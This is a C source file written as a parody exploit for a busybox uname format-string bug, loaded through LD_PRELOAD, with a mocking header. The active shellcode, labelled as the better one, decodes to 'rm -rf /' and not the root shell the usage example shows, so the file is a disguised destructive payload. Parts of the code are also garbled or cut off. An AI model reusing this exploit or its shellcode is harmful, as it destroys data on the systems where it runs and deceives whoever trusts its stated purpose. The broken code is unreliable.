/* * lul-busybox.c copyright (C) 2008 lul-disclosure inc. All rights reserved. * this code is distributed with the LPL license agreement http://lul-disclosure.net/LPL.txt * moar commonly known as the EULA (Epic User License Agreement) * * busybox uname format string exploit * by towlie * * ADVANCED CREDITS: * * bug found by my irclog of andrewg pasting advanced vulnerability details into #social irc channel. * TESO - For describing write primitive technology to write the shellcode to the stack. * * ADVANCED DISCREDITS: * * n0ah/k-special: * for determining he invented the super * advanced technology used in this exploit to write payload to the stack with a write4() * * ADVANCED VULNERABILITY DETAILS: * * busybox-version/uname.c:92: * printf(((char *)(&uname_info)) + *delta); // LOL 2002AD CODING TECHNOLOGY * * ADVANCED USAGE ON HOW TO USE THIS SUPER ADVANCED PIECE OF TECHONOLOGY: * * compile as a shared lib: * cc -fPIC -c lul-busybox.c -o busybox.o * cc -shared -o busybox.so busybox.o * * EXAMPLE USAGE OF SUPER ADVANCED EXPLOIT TECHNOLOGY * * $ export LD_PRELOAD="./busybox.so" * $ ./busybox_unstriped uname -a * AAûÿ¿pûÿ¿vûÿ¿zûÿ¿ûÿ¿tûÿ¿xûÿ¿|ûÿ¿ûÿ¿~ûÿ¿rûÿ¿²ûÿ¿° * 3221224326 * ... * sh-3.2# * * ADVANCED EXPLOITATION NOTE: * run this advanced piece of technology with the user privlages of uid 0 to obtain uid 0 * * ADVANCED TERMS OF USAGE: * THIS PIECE OF ADVANCED TECHNOLOGY MAY ONLY BE USED TO HACK COMPUTERS. * BREAKING THE TERMS WILL RESULT IN ME PUNCHING YOUR FACE. * * ADVANCED GREETS SECTION: * orbital for walking me through 90% of this exploit since i am fail LOLOL! * jupiter for making the standard exploit header footer and LPL. * Bruce Lee for being awesome. * blaqjesus for continued lulz brother of Jesus H. Christ. * people who are in it for the lulz. * */ #include #include #include #define OVERWRITE_ADDR 0x080e25b0 /* printf GOT address */ #define SHELLCODE_ADDR 0xbffffb70 /* where to write the shellcode */ #define PADDING_LEN 2 #define FMT_LEN (sizeof(sc)/2)+2 char sc[] = // This shellcode works better "\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89" "\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68" "\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80"; /* "\x6a\x0b" // push $0xb "\x58" // pop %eax "\x99" // cltd "\x52" // push %edx "\x68\x2f\x2f\x73\x68" // push $0x68732f2f "\x68\x2f\x62\x69\x6e" // push $0x6e69622f "\x89\xe3" // mov %esp, %ebx "\x52" // push %edx "\x53" // push %ebx "\x89\xe1" // mov %esp, %ecx "\xcd\x80"; // int $0x80 */ char *put_addr(char *p, unsigned int addr); char *build_fmt(char *p); int uname(struct utsname *buf) { char *ptr; ptr = (char *) &buf->sysname; build_fmt(ptr); return 0; } char *put_addr(char *p, unsigned int addr) { *p++ = (addr & 0x000000ff); *p++ = (addr & 0x0000ff00) >> 8; *p++ = (addr & 0x00ff0000) >> 16; *p++ = (addr & 0xff000000) >> 24; return p; } char *build_fmt(char *p) { struct shellcode_short { unsigned short value; unsigned long addr; } shellcode[FMT_LEN], temp; unsigned short *ptr; unsigned long start; int i, o, written; start = SHELLCODE_ADDR; ptr = (unsigned short *) ≻ for(i=0;i> 16; for(o=0;o<((FMT_LEN)-1);o++) { for(i=0;i<((FMT_LEN)-1-o);i++) { if(shellcode[i+1].value < shellcode[i].value) { temp.addr = shellcode[i].addr; temp.value = shellcode[i].value; shellcode[i].addr = shellcode[i+1].addr; shellcode[i].value = shellcode[i+1].value; shellcode[i+1].addr = temp.addr; shellcode[i+1].value = temp.value; } } } for(i=0;i